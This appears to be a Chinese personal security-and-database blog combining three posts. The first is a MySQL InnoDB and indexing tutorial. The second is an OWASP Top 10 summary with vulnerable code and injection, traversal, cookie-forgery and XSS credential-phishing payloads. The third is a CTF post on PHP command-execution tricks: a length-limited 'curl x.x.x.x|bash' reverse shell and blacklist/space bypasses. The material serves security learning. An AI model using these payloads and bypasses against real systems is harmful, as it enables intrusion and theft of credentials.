一般在目标数据较小，而且访问非常频繁适合使用，造成内存的使用可以通过参数max_help_table_size控制Memory表的大小，如果数据是临时的，而且要求必须被立即使用，就可以存放在内存表之中，若数据丢失，不会对应用服务产生实质的负面影响，Memory同时支持散列索引和B数索引。

CSV

实际上是带有逗号分隔符的文本文件，CVS表允许以CSV格式导入或转储数据，以便与读取和写入相同格式的脚本和应用程序交换数据。

CSV 存储引擎因为自身文件格式的原因，所有列必须强制指定 NOT NULL 。

CSV 存储引擎也会包含一个存储表结构的 .frm 文件，还会创建一个 .csv 存储数据的文件，还会创建一个同名的元信息文件，该文件的扩展名为 .CSM ，用来保存表的状态及表中保存的数据量。每个数据行占用一个文本行。

BLACKHOLE

黑洞存储引擎，所有插入的数据并不会保存，BLACKHOLE 引擎表永远保持为空，写入的任何数据都会消失。

InnoDB底层原理

架构图：

Buffer Pool

缓冲池

InnoDB为了做数据的持久化，会将数据存储到磁盘上。但是面对大量的请求时，CPU的处理速度和磁盘的IO速度之间差距太大，为了提高整体的效率， InnoDB引入了缓冲池。

缓冲池是内存中的一个区域，在InnoDB访问表和索引数据的时候会在其中进行高速缓存，缓冲池允许直接从内存访问经常使用的数据，从而加快了处理速度。在专用服务器上，通常将多达80％的物理内存分配给缓冲池。

为了提高大容量读取操作的效率，缓冲池被划分为多个页面，这些页面可以潜在地容纳多行，为了提高缓存管理的效率，使用最近最少使用（LRU）算法的变体，将很少使用的数据从缓存中老化掉。

如何利用缓冲池将经常访问的数据保留在内存中是MySQL调优的重要方面。

Buffer Pool LRU Algorithm

缓冲池LRU算法

缓冲池使用LRU算法的变体作为列表进行管理。当需要空间以将新页面添加到缓冲池时，将驱逐最近使用最少的页面，并将新页面添加到列表的中间。此中点插入策略将列表视为两个子列表：

最前面是最近访问过的新页面（“年轻”）的子列表
在末尾，是最近访问过的旧页面的子列表

官方结构图如下：

3/8的缓存池专用于旧的子列表
列表中点是新子列表的尾部与旧子列表的头部相交的界面
当InnoDB将页面读入缓冲池时，首先插入中点
访问旧子列表中的页面会使得其变为”年轻“，然后移至新子列表的开头
随着数据库的运行，通过移至列表的末尾，缓冲池中未访问的页面将“老化”，新的和旧的子列表中的页面都会随着其他页面的更新而老化，随着在中点插入页面，旧子列表中的页面也会老化。最终，未使用的页面到达旧子列表的尾部并被逐出。

Change Buffer

插入缓冲

插入缓冲针对的操作是更新或者插入，我们考虑最坏的情况，那就是需要更新的数据都不在缓冲池中。那么此时等数据达到某个阈值（例如50条）才批量的写入磁盘

innodb_change_buffering 变量控制InnoDB 执行更改缓冲的程度，默认值为all。

all
默认值：缓冲区插入，删除标记操作和清除。
none
不要缓冲任何操作。
inserts
缓冲区插入操作。
deletes
缓冲区删除标记操作。
changes
缓冲插入和删除标记操作。
purges
缓冲在后台发生的物理删除操作。

innodb_change_buffer_max_size 变量允许将更改缓冲区的最大大小配置为缓冲池总大小的百分比。默认情况下， innodb_change_buffer_max_size设置为25。最大设置为50。

Log Buffer

日志缓冲

日志缓冲区是存储区域，用于保存要写入磁盘上的日志文件的数据。日志缓冲区大小由innodb_log_buffer_size变量定义。默认大小为16MB。日志缓冲区的内容会定期刷新到磁盘。较大的日志缓冲区使大型事务可以运行，而无需在事务提交之前将重做日志数据写入磁盘。因此，如果有更新，插入或删除许多行的事务，则增加日志缓冲区的大小可以节省磁盘I/O。

Adaptive Hash Index

自适应哈希索引

自适应索引就跟JVM在运行过程中，会动态的把某些热点代码编译成Machine Code一样，InnoDB会监控对所有索引的查询，对热点访问的页建立哈希索引，以此来提升访问速度。

Doublewrite Buffer

双写缓冲区

插入缓冲提高了MySQL的性能，而两次写则在此基础上提高了数据的可靠性。当数据还在缓冲池中的时候，当机器宕机了，发生了写失效，有Redo Log来进行恢复。但是如果是在从缓冲池中将数据刷回磁盘的时候宕机了呢？

这种情况叫做部分写失效，此时重做日志就无法解决问题。

在刷脏页时，并不是直接刷入磁盘，而是copy到内存中的Doublewrite Buffer中，然后再拷贝至磁盘共享表空间（你可以就理解为磁盘）中，每次写入1M，等copy完成后，再将Doublewrite Buffer中的页写入磁盘文件。

有了两次写机制，即使在刷脏页时宕机了，在实例恢复的时候也可以从共享表空间中找到Doublewrite Buffer的页副本，直接将其覆盖原来的数据页即可。

尽管数据被写入两次，但双写缓冲区不需要两倍的I / O开销或两倍的I / O操作。只需一次fsync()调用操作系统即可将数据按较大的顺序块写入doublewrite缓冲区（除非 innodb_flush_method设置为 O_DIRECT_NO_FSYNC）。

在MySQL 8.0.20之前，doublewrite缓冲区存储区位于InnoDB系统表空间中。从MySQL 8.0.20开始，doublewrite缓冲区存储区位于doublewrite文件中。

Redo Log

重做日志

用于记录事务操作的变化，且记录的是修改之后的值。

不管事务是否提交都会记录下来。例如在更新数据时，会先将更新的记录写到Redo Log中，再更新缓存中页中的数据。然后按照设置的更新策略，将内存中的数据刷回磁盘。

Undo Log

撤消日志

记录事务开始之前的一个版本，可用于事务失败之后发生的回滚。

索引

MySQL索引的建立对于MySQL的高效运行是很重要的，索引可以大大提高MySQL的检索速度。

拿汉语字典的目录页（索引）打比方，我们可以按拼音、笔画、偏旁部首等排序的目录（索引）快速查找到需要的字。

创建索引时，你需要确保该索引是应用在 SQL 查询语句的条件(一般作为 WHERE 子句的条件)。

实际上，索引也是一张表，该表保存了主键与索引字段，并指向实体表的记录。

过多的使用索引将会造成滥用。因此索引也会有它的缺点：虽然索引大大提高了查询速度，同时却会降低更新表的速度，如对表进行INSERT、UPDATE和DELETE。因为更新表时，MySQL不仅要保存数据，还要保存一下索引文件。建立索引会占用磁盘空间的索引文件。

索引分为：

主键索引
primary key() 要求关键字不能重复，也不能为null,同时增加主键约束
主键索引定义时，不能命名
唯一索引
unique index() 要求关键字不能重复，同时增加唯一约束
普通索引
index() 对关键字没有要求
全文索引
fulltext key() 关键字的来源不是所有字段的数据，而是字段中提取的特别关键字

先了解一下索引的数据结构 B-Tree（MySQL主要使用 B-tree 平衡树）

B树

B树也称B-树,它是一颗多路平衡查找树。大致结构如下

B树的阶为节点的最多的子节点数

B数的搜索方式从根节点开始，对节点内的关键字（有序）序列进行二分查找，如果命中则结束，否则进入查询关键字所属范围的儿子节点，叶子节点和非叶子节点都存放数据，搜索有可能在非叶子节点结束。

B+树

B+ 树是 B 树的变体，也是一种多路搜索树。

B+树只有到达叶子节点才命中，即所有关键字都出现在叶子节点链表中

数据只能在叶子节点，也叫 稠密索引，且链表中的关键字（数据）恰好是有序的。

非叶子节点相当于是叶子节点的索引，也叫 稀疏索引，叶子节点相当于是存储（关键字）数据的数据层

B+数对于B数的优势

单一节点存储的元素多，使得查询的IO次数更少，适合做MySQL的底层数据结构
所有查询都要查到叶子节点，查询性能稳定
所有叶子节点形成一个有序的链表，便于查找

哈希索引

只有精确匹配索引所有列的查询才有效。每行数据存储引擎都会对所有的索引列计算一个哈希码，哈希索引将哈希码存储在索引中，同时在哈希表中保存指向每个数据行的指针。因为索引自身只存储对应的哈希值，所以索引的结构十分紧凑，哈希索引查找的速度非常快。但是

不按照索引顺序存储，无法用于排序
不支持部分索引查找匹配
不支持范围查找

聚集索引

由B+树实现，一个表只能有一个聚集索引，InnoDB表中聚集索引的索引列就是主键，所以聚集索引也叫主键索引。如下表：

create table Student(    id int(11) primary key auto_increment,    last_name varchar(50) not null,     first_name varchar(50) not null,     birthday date not null);

聚集索引的结构如下：

聚簇索引：索引的叶节点指向数据
非聚簇索引：索引的叶节点指向数据的引用
myisam使用非聚簇索引，innodb使用聚簇索引

二级索引

对于InnoDB表，在非主键列的其他列上建的索引就是二级索引（因为聚集索引只有一个）。

在MySQL中主键索引的叶子节点存的是整行数据，而二级索引叶子节点内容是主键的值。

详见：MySQL · 引擎特性 · 二级索引分析

索引优化

尽量保证全值匹配，即索引字段和select字段相同且顺序一致
最佳左前缀法则：如果索引多列，则查询要从索引的最左列开始，且中间不跳过索引中的列

不在索引列上做任何操作(计算、函数、类型转换、不要出现隐式转)，会导致索引失效而全表扫描

假设目标行 name = 'july'select * from info where name='july';           ## 走索引 select * from info where left(name,4)='july';   ## 不走索引

一旦出现非等值字段条件判断，则该字段后的索引列皆失效

select * from info where a=10 and b=100 and c=1000;   ## 全索引  a_b_c  select * from info where a=10 and b>100 and c=1000;   ## 部分索引 a_b  ## 非等值条件包括：in < > != like 等  ## 注意：当like 'aaa%' 通配符在右时，仍然能够走全索引  select * from info where a=10 and b like '100%' and c=1000;   ## 全索引  a_b_c  select * from info where a=10 and b like '%100' and c=1000;   ## 部分索引 a

尽量使用覆盖索引，即查询列为索引列的子集，减少select * 的使用

MySQL在使用不等于(!=或者<>)时无法使用索引，会导致全表扫描

select * from info where a=100;     ## 走索引  select * from info where a!=100;    ## 不走索引，全表扫描

查询条件为 is NULL 和 is not NULL情况时也无法使用索引

select * from info where a is null;      ## 不走索引  select * from info where a is not null;  ## 不走索引

like以通配符开头('%abc...')时索引也会失效，变为全表扫描；但通配符结尾依然会走索引，该字段后的索引依然失效

select name, age from info where name like "%aaa";  ## 索引失效  select name, age from info where name like "aaa%";  ## 索引有效  ## 当业务要求必须使用左通配符时，可使用覆盖索引的方法来避免索引失效  ## 在上面例子中即建立联合索引 name_age

字符串不加单引号会导致索引失效原因：隐式转换

## id为varchar类型  select * from info where id='2000';  select * from info where id=2000;  ## 会有隐式类型转换

尽量少用or，用它来连接查询条件可能会导致索引失效
group by基本上都需要进行排序，当group by的字段顺序和索引顺序不一致的时候，就会导致临时表的产生，即同时出现 Using temporary 和 Using filesort，因此一定要极力避免
```
## 索引为 A_B_C  select * from info where A=10 group by C, B;  ## 走索引A，产生临时表
```

小结

对于单值索引，尽量选择针对当前查询过滤性更好的索引字段
在选择联合索引时，当前查询中过滤性最好的字段在索引字段顺序中位置越靠前越好
在选择联合索引时，尽可能选择可以包含当前查询的where子句中更多字段的索引，即如果可能的话，尽量达到索引覆盖，这样不仅能够避免索引失效，也能够避免回表等影响查询性能等操作
尽可能通过分析统计信息和调整查询语句的写法来达到适应选择的索引

参考

Owasp_Top_10

2021-01-30T02:49:21.000Z

Owasp 全称 Open Web Application Security Project（开放式Web应用程序安全项目）。

其中最具权威的就是其”十大安全漏洞列表”，目前正式发布的最新版本是2017年11月份发布的。

以下对2017年的Top 10版本做一个归纳，例子中不全的欢迎各位大佬评论指出，后续有会添加上。

注入（Injection）

简介

当不可信的数据作为命令或查询语句的一部分被发送给解释器的时候，会发生注入漏洞，包括SQL、NoSQL、OS以及LDAP注入等。攻击者发送的恶意数据可能会诱使解释器执行计划外的命令，或在没有适当授权的情况下访问数据。

Example

SQL注入

string userName = ctx.getAuthenticatedUserName();string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";sda = new SqlDataAdapter(query, conn);DataTable dt = new DataTable();sda.Fill(dt);

改代码准备执行的查询如下：

SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>;

但是查询是通过固定的查询字符和用户的输入字符串连接来动态构成的，若攻击者在owner处构造name'; DELETE FROM items; --，则SQL语句变成了

SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name'; DELETE FROM items; --'

参考：CWE-89: SQL Injection

本站案例：CTF-SQL注入，Sqli-labs靶场

命令注入

String btype = request.getParameter("backuptype");String cmd = new String("cmd.exe /K \" c:\\util\\rmanDB.bat " + btype + "&&c:\\utl\\cleanup.bat\"")System.Runtime.getRuntime().exec(cmd);

以上代码来自一个管理web的应用程序，改程序旨在允许用户使用批处理文件程序来对Oracle数据库进行备份，然后运行cleanup.bat脚本删除一些临时文件，备份脚本rmanDB.bat接收单个命令参数，该参数指定要执行的备份类型，由于对数据库的访问受到限制，因此该备份脚本通常是以特权用户身份运行的

通常Runtime.exec()函数不会执行多个命令，但是在这种情况下，程序首先运行cmd.exe shell，以便通过一次调用Runtime.exec()来运行多个命令。调用完rmanDB后，接着调用由&&分隔的多个命令。若攻击者传入的字符串形式为& del c:\\dbms\\*.*，那么该应用程序将执行此命令以及攻击者传入的其它命令 del

http://example.com/app/accountView?backuptype=& del c:\\dbms\\*.*

参考：CWE-77: Command Injection

本站案例：CTF-命令执行，php命令执行小技巧

服务器端模板注入（SSTI）

require_once dirname(__FILE__).'/../lib/Twig/Autoloader.php';Twig_Autoloader::register(true);$twig = new Twig_Environment(new Twig_Loader_String());$output = $twig->render("Hello {$_GET['name']}");  // 将用户输入作为模版内容的一部分echo $output;

该段代码使得用户可以在发送电子邮件之前自定义使用的名称，但是若攻击者不将静态值传递到模板中，而是使用GET参数动态生成模板本身的一部分name，如下所示

http://vulnerable-website.com/?name=IsVuln{# comment #}{{2*8}}OK

由于 `` 作为 Twig 模板引擎的默认注释形式，所以在前端输出的时候并不会显示，而 {{2*8}} 作为模板变量最终会返回 16 作为其值进行显示，因此前端最终会返回内容 Hello IsVuln16OK

参考：PortSwigger: Server-side template injection，服务端模板注入攻击 (SSTI) 之浅析

本站案例：CTF-SSTI

Prevent

使用安全的API
使用“白名单”对服务器端的输入进行验证
使用特定的转义语法来转义特殊字
在查询中使用LIMIT和其他SQL控件，防止SQL注入的情况下大量泄露记录

参考：A1:2017-Injection

失效的身份认证

简介

通过不规范的使用应用程序的身份认证和会话管理功能，从而使攻击者能够破译密码，密钥或会话令牌，或者暂时或永久的冒充其它用户的身份

Example

my $q = new CGI;if ($q->cookie('loggedin') ne "true") {    if (! AuthenticateUser($q->param('username'), $q->param('password'))) {    ExitError("Error: you need to log in first");    }else {        # Set loggedin and user cookies.        $q->cookie(        -name => 'loggedin',        -value => 'true'        );        $q->cookie(        -name => 'user',        -value => $q->param('username')        );    }}if ($q->cookie('user') eq "Administrator") {DoAdministratorTasks();}

以上代码旨在确保用户已经登录，如果未登录，则代码将使用用户提供的用户名和密码进行身份验证，如果成功，它将登录用户并将用户的cookie设置为“记住”用户已经登录，最后，如果登录的用户的cookie中具有“管理员”用户名，则代码将执行管理员任务。

然而，这段代码是可以绕过的，攻击者可以独立设置cookie，使得代码不会检查用户名和密码，并且还可以伪造“管理员”身份进行操作，伪造的request头如下：

GET /cgi-bin/vulnerable.cgi HTTP/1.1Cookie: user=AdministratorCookie: loggedin=true

通过将登录的cookie loggedin设置为“true”，攻击者将绕过整个身份认证；通过使cookie user为“Administrator”值，从而获得管理员权限

参考：CWE-287: Improper Authentication

Prevent

实施多因素身份认证，以防止自动进行凭据填充，暴力破解和凭据重用攻击
不适用默认密码，弱密码，尤其是对于管理员用户
实施密码检测，限制密码长度，复杂性
限制登录失败次数，频繁的登录尝试，记录故障，并在检测到攻击时提醒管理员
适用服务器端安全的内置会话管理器

参考：A2:2017-Broken Authentication

敏感信息泄露

简介

我们的敏感信息包括密码、财务数据、医疗数据等，由于web应用或者API未加密或不正确的保护敏感数据，这些数据极易遭到攻击者利用，攻击者可能使用这些数据来进行一些犯罪行为，因此，未加密的信息极易遭到破坏和利用，我们应该加强对敏感数据的保护，web应用应该在传输过程中数据、存储的数据以及和浏览器的交互时的数据进行加密，保证数据安全。

Example

function persistLogin($username, $password){    $data = array("username" => $username, "password"=> $password);    setcookie ("userdata", $data);}

此代码将用户的信息写入cookie，因此用户以后不必再次登录

该代码以纯文本的格式将用户的用户名和密码存储在计算机的cookie中，如果攻击者破坏了用户的计算机，则这将公开用户的登录信息，即使用户的计算机没有受到损害，当这种弱点加上跨站点脚本可能使攻击者远程复制cookie

Prevent

对应用程序处理，存储或传输的数据进行分类。
不存储不必要的敏感数据，尽快将其丢弃
确保对静态的所有敏感数据进行加密，并且使用最新且功能强大的标准算法，协议和密钥
使用安全协议对传输中的所有数据进行加密，如https，hsts

参考：A3:2017-Sensitive Data Exposure

XML外部实体（XXE）

简介

XXE 全称为XML External Entity attack 即XML(可扩展标记语言) 外部实体注入攻击，早期或配置错误的XML处理器评估了XML文件外部实体引用，攻击者可以利用这个漏洞窃取URI(统一资源标识符)文件处理器的内部文件和共享文件、监听内部扫描端口、执行远程代码和实施拒绝服务攻击。

Example

    $xml = simplexml_load_string($_REQUEST['xml']);    print_r($xml);?>

DOCTYPE xxe [<!ELEMENT name ANY >]><root><name>&file;name>root>

具体参考本站：XXE学习笔记

Prevent

尽可能使用不太复杂的数据格式（如：JSON）避免敏感数据的序列化
修补或升级应用程序或基础操作系统上正在使用的所有XML处理器和库
在应用程序的所有XML解析器中禁用XML外部实体和DTD处理。
在服务器端实施“白名单”输入验证，过滤或清理操作

失效的访问控制

简介

通过身份验证的用户，可以访问其他用户的相关信息，没有实施恰当的访问权限。攻击者可以利用这个漏洞去查看未授权的功能和数据，例：访问用户的账户、敏感文件、获取和正常用户相同的权限等.

Example

my $dataPath = "/users/cwe/profiles";my $username = param("user");my $profilePath = $dataPath . "/" . $username;open(my $fh, "<$profilePath") || ExitError("profile read error: $profilePath");    print "\n";    while (<$fh>) {    print "$_
\n";}print "
\n";

以上代码可能适用于社交网络应用程序，其中用户的个人资料信息都存储在单独的文件中，所有文件都存储在一个目录中

尽管程序员打算访问“/users/cwe/profiles/alice”之类的文件，但没有验证传入的用户参数。攻击者可能会提供以下字符串：

../../../etc/passwd

该程序将生成如下的配置文件路径名：

/users/cwe/profiles/../../../etc/passwd

打开文件后，操作系统会在路径规范化期间解析“ ../”，并实际访问此文件：

/etc/passwd

结果，攻击者可以阅读密码文件的整个文本

Prevent

除公共资源外，默认情况下拒绝
一次实施访问控制机制，并在整个应用程序中重复使用它们，包括最大程度地减少CORS的使用。
禁用Web服务器目录列表，并确保Web根目录中不存在文件元数据（例如.git）和备份文件。
限速API和控制器访问权限，以最大程度减少自动攻击工具带来的危害。

安全配置错误

简介

安全配置错误是比较常见的漏洞，由于操作者的不当配置(默认配置，临时配置，开源云存储，http标头配置，以及包含敏感信息的详细错误)，导致攻击者可以利用这些配置获取到更高的权限，安全配置错误可以发生在各个层面，包含平台、web服务器、应用服务器、数据库、架构和代码。

Example

Properties prop = new Properties();prop.load(new FileInputStream("config.properties"));String password = prop.getProperty("password");DriverManager.getConnection(url, usr, password);

以下代码从属性文件中读取密码，并使用该密码连接到数据库。

该代码将成功运行，但是有权访问config.properties的任何人都可以读取密码的值。如果攻击者有权访问此信息，则可以使用它来入侵系统。

参考：CWE-256: Unprotected Storage of Credentials

Prevent

自动化安装部署，保证开发，QA，产品环境的配置尽量相同，减少部署一个新安全环境的耗费，
及时了解并部署每个环境的软件更新和补丁信息
使用提供有效分离的安全性强大的应用程序架构
实施漏洞扫描和安全审计，以帮助检查错误的配置或者未安装的补丁

参考：A6：2017-安全性错误配置

跨站点脚本（XSS）

简介

xss攻击全称为跨站脚本攻击,当应用程序的新网页中包含不受信任的、未经恰当验证、转义的数据或可以使用HTML、JavaScript的浏览器API更新的现有网页时，就会出现xss漏洞，跨站脚本攻击是最普遍的web应用安全漏洞，甚至在某些安全平台都存在xss漏洞。xss会执行攻击者在浏览器中执行的脚本，并劫持用户会话，破坏网站或用户重定向到恶意站点，使用xss还可以执行拒绝服务攻击。

Example

反射型XSS

$username = $_GET['username'];echo ' Welcome, ' . $username . '
';

以上代码基于HTTP GET用户名参数在网页上显示欢迎消息。

由于参数可以是任意的，因此可以修改页面的url，因此$username可以包含脚本语法，例如：

http://trustedSite.example.com/welcome.php?username=

这样会弹出无害的警告对话框，最初这不是一个很大的漏洞，毕竟，为什么有人输入一个导致恶意代码在其自己的计算机上运行的URL？真正的危险在于，攻击者将创建恶意URL，然后使用电子邮件或社交工程技巧诱使受害者访问URL的链接。当受害者单击链接时，他们会通过易受攻击的Web应用程序不经意地将恶意内容反映回自己的计算机。更现实的是，攻击者可以在页面上嵌入一个伪造的登录框，诱使用户将用户的密码发送给攻击者：

http://trustedSite.example.com/welcome.php?username=Please Login:Username: 
Password:

如果用户单击此链接，那么Welcome.php将生成以下HTML并将其发送到用户的浏览器：

<div class="header"> Welcome, <div id="stealPassword"> Please Login:    <form name="input" action="attack.example.com/stealPassword.php" method="post">        Username: <input type="text" name="username" /><br/>        Password: <input type="password" name="password" /><br/>        <input type="submit" value="Login" />    form>div>div>

但是，精明的用户可能会注意到URL上附加了可疑文本。攻击者可能进一步混淆URL（以下示例链接分为多行以提高可读性）：

http://trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A+%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

相同的攻击字符串也可能被混淆为：

http://trustedSite.example.com/welcome.php?username=document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');

这两个攻击链接都将导致页面上显示伪造的登录框，并且用户更有可能忽略URL末尾的难以理解的文本。

存储型XSS

CreateUser.php

$username = mysql_real_escape_string($username);$fullName = mysql_real_escape_string($fullName);$query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ;mysql_query($query);

ListUsers.php

$query = 'Select * From users Where loggedIn=true';$results = mysql_query($query);if (!$results) {exit;}//Print list of users to pageecho 'Currently Active Users:';while ($row = mysql_fetch_assoc($results)) {echo ''.$row['fullname'].'
';}echo '
';

以上的web应用程序由两个独立的页面组成，一个页面用于创建用户的账户，另外一个页面用于列出当前登录的活动用户

攻击者可以将其名称设置为任意HTML，然后将其显示给“活动用户”页面的所有访问者。该HTML例如可以是窃取登录消息的密码。

参考：CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Prevent

使用设计上自动转义XSS的框架，例如最新的Ruby on Rails, React JS，了解每个框架的XSS保护的局限性，并适当处理未涵盖的用例
根据HTML输出中的上下文（正文，属性，JavaScript，CSS，或URL）转义不受信任的HTTP请求数据将解决XSS漏洞

参考：A7:2017-Cross-Site Scripting (XSS)

不安全的反序列化

简介

不安全的反序列化可以导致远程代码执行、重放攻击、注入攻击或特权升级攻击

Example

参考本站：

Prevent

在所有序列化对象上实施完整性检查，例如数字签名，以防止恶意创建对象或篡改数据。
在对象创建之前的反序列化过程中强制执行严格的类型约束，因为代码通常希望使用一组可定义的类。
隔离并运行可能在低特权环境中反序列化的代码。

参考：A8:2017-Insecure Deserialization

使用含有已知漏洞的组件

简介

组件(eg：库、框架或其他软件模块)拥有应用程序相同的权限，如果应用程序中含有已知漏洞，攻击者可以利用漏洞获取数据或接管服务器。同时，使用这些组件会破坏应用程序防御，造成各种攻击产生严重的后果。

Example

参考本站：

CTF-CVE

漏洞查找：

MITER常见漏洞和披露（CVE）搜索

NVD漏洞数据库

Prevent

使用诸如version，DependencyCheck，retire.js等工具，连续清点客户端和服务器端组件（例如，框架，库）的版本及其依赖项。持续监视CVE和NVD等来源的组件中的漏洞。使用软件组成分析工具来自动化该过程。订阅电子邮件警报以获取与您使用的组件相关的安全漏洞。
仅通过安全链接从官方来源获取组件。优先选择经过签名的软件包，以减少包含经过修改的恶意组件的机会。
监视未维护的库和组件或未为旧版本创建安全补丁的组件。如果无法修补，请考虑部署虚拟修补程序以监视，检测或防止发现的问题。

参考：A9:2017-Using Components with Known Vulnerabilities

不足的日志记录和监控

简介

不足的日志记录和监控，以及事件响应缺失或无效的集成，使攻击者能够进一步攻击系统、保持持续性的或攻击更多的系统，以及对数据的不当操作。

Example

function login($userName,$password){    if(authenticate($userName,$password)){    return True;    }else{        incrementLoginAttempts($userName);        if(recentLoginAttempts($userName) > 5){        writeLog("Failed login attempt by User: " . $userName . " at " + date('r') );        }    }}

以上代码记录可疑的多次登录尝试。

此代码仅在达到特定限制时记录失败的登录尝试。如果攻击者知道此限制，则可以通过避免该限制来阻止发现攻击。

参考：CWE-223: Omission of Security-relevant Information

Prevent

确保可以使用足够的用户上下文记录所有登录，访问控制失败和服务器端输入验证失败的事件，以识别可疑或恶意帐户，并保留足够的时间以进行处理。
确保以一种集中式日志管理解决方案可以轻松使用的格式生成日志。
确保高价值交易具有完整性控制的审计跟踪，以防止篡改或删除，例如仅追加数据库表或类似内容。
建立有效的监视和警报，以便及时发现并应对可疑活动。
建立或采用事件响应和恢复计划，例如NIST 800-61 rev 2或更高版本。

参考：A10:2017-Insufficient Logging & Monitoring

参考

php命令执行小技巧

2020-08-14T02:55:31.000Z

突破命令长度限制

限制条件：长度<=4

限制代码：

show_source(__FILE__);error_reporting(0);if(strlen($_GET[1])<=4){     echo shell_exec($_GET[1]);}else{     echo "hack!!!";}?>

命令执行

先看效果图：

原理

>后面跟的文件名，可以生成一个以这个字符串命名的文件
*可以将文件名（按首字母排序）列出来当一行命令执行
*v匹配当前目录下以v结尾的的文件名，*v=rev v，输出v文件内容里面内容的反序结果，>cat|*t同理
dir a b>c只会将a b写到文件c中

反弹shell

先看效果图：

获取ls -th >g命令

获取curl x.x.x.x|bash命令

>cu\\这里看着是5个字符，超过了4个的限制，实际上是因为 shell环境需要输入\\产生\，但是php 代码exec时，只需要输入\即可产生\，比如 exec(">cu\")即可。所以这里实际上是不超过4个字符的，为了演示直观，在shell中直接执行

执行结果：

原理

ls -t按时间顺序排列文件，ls -th不影响命令执行，为了让倒序的时候ht-在sl前面
\ linux下行末加上\会将该行末尾与下一行行首连接起来，简单来说应该是删掉了换行符

这里需要注意，文件名中不能包含/这个符号的，所以需要将反弹shell的服务器根目录下默认网页设置成curl下反弹shell的命令的网页

例如我ubuntu服务器的Apache默认网页设置在/etc/apache2/mods-available/dir.conf中，编辑如下

1.txt中为反弹shell的命令，这样即可成功执行

或者你改index.html的内容也行

绕过空格

${PS2} 对应字符 ‘>’
${PS4} 对应字符 ‘+’
${IFS} 对应内部字段分隔符
${9} 对应空字符串

${IFS}linux@Extrader:/var/www/html$ cat /flagflag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ cat${IFS}/flagflag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ cat${IFS}$9/flagflag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ cat$IFS$9/flagflag{3e23f43-235tg54-2d4t54g-43e3ed23e}php下可以cat%09/flag<>linux@Extrader:/var/www/html$ cat</flagflag{3e23f43-235tg54-2d4t54g-43e3ed23e}

黑名单绕过

拼接linux@Extrader:/var/www/html$ a=c;b=at;c=/flag;$a$b $cflag{3e23f43-235tg54-2d4t54g-43e3ed23e}base64编码linux@Extrader:/var/www/html$ `echo "Y2F0IC9mbGFn"|base64 -d`flag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ echo "Y2F0IC9mbGFn"|base64 -d|bashflag{3e23f43-235tg54-2d4t54g-43e3ed23e}单引号、双引号linux@Extrader:/var/www/html$ c""at /flagflag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ c""at /fl""agflag{3e23f43-235tg54-2d4t54g-43e3ed23e}linux@Extrader:/var/www/html$ c""at /fl''agflag{3e23f43-235tg54-2d4t54g-43e3ed23e}反斜线 \linux@Extrader:/var/www/html$ ca\t /fl\agflag{3e23f43-235tg54-2d4t54g-43e3ed23e}

文件读取

